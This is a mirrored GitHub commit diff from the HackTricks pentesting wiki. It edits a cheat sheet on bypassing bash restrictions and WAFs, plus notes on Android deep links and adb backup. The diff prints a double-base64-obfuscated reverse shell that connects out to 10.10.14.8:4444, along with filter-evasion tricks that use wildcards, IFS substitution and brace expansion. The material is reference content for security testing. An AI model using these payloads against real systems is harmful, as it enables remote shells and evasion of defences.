mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [master] 3 pages and 2 assets modified
This commit is contained in:
parent
4b589d8305
commit
f83c915d69
4 changed files with 22 additions and 11 deletions
Before Width: | Height: | Size: 1.6 KiB After Width: | Height: | Size: 1.6 KiB |
|
@ -1,13 +1,16 @@
|
|||
# WAF Evasion / Bypass Bash Restrictions
|
||||
# Bypass Bash Restrictions
|
||||
|
||||
## Reverse Shell
|
||||
```sh
|
||||
|
||||
```bash
|
||||
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
|
||||
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
|
||||
#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
|
||||
```
|
||||
|
||||
## Bypass Paths and forbidden commands
|
||||
```sh
|
||||
|
||||
```bash
|
||||
# Question mark binary substitution
|
||||
/usr/bin/p?ng # /usr/bin/ping
|
||||
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
|
||||
|
@ -46,7 +49,8 @@ whoa # This will throw an error
|
|||
```
|
||||
|
||||
## Bypass forbidden spaces
|
||||
```sh
|
||||
|
||||
```bash
|
||||
# {form}
|
||||
{cat,lol.txt} # cat lol.txt
|
||||
{echo,test} # echo test
|
||||
|
@ -77,16 +81,19 @@ uname!-1\-a # This equals to uname -a
|
|||
```
|
||||
|
||||
## Bypass IPs
|
||||
```sh
|
||||
|
||||
```bash
|
||||
# Decimal IPs
|
||||
127.0.0.1 == 2130706433
|
||||
```
|
||||
|
||||
## References & More
|
||||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}
|
||||
|
||||
{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %}
|
||||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\#exploits" caption="" %}
|
||||
|
||||
{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
|
||||
{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" caption="" %}
|
||||
|
||||
{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" caption="" %}
|
||||
|
||||
{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" caption="" %}
|
||||
|
||||
{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
|
||||
|
|
|
@ -97,7 +97,7 @@ In this case you could try to abuse the functionality creating a web with the fo
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](../../.gitbook/assets/image%20%28436%29.png)
|
||||
![](../../.gitbook/assets/image%20%28436%29%20%281%29.png)
|
||||
|
||||
Learn how to [call deep links without using HTML pages below](./#exploiting-schemes-deep-links).
|
||||
|
||||
|
@ -455,7 +455,7 @@ _Note that you can **omit the package name** and the mobile will automatically c
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](../../.gitbook/assets/image%20%28435%29.png)
|
||||
![](../../.gitbook/assets/image%20%28436%29.png)
|
||||
|
||||
#### Sensitive info
|
||||
|
||||
|
|
|
@ -348,5 +348,9 @@ adb backup [-apk] [-shared] [-system] [-all] -f file.backup
|
|||
# -shared -- Include removable storage
|
||||
# -system -- Include system Applciations
|
||||
# -all -- Include all the applications
|
||||
|
||||
adb shell pm list packages -f -3 #List packages
|
||||
adb backup -f myapp.ab -apk com.myapp # backup on one device
|
||||
adb restore myapp.ab # restore to the same or any other device
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue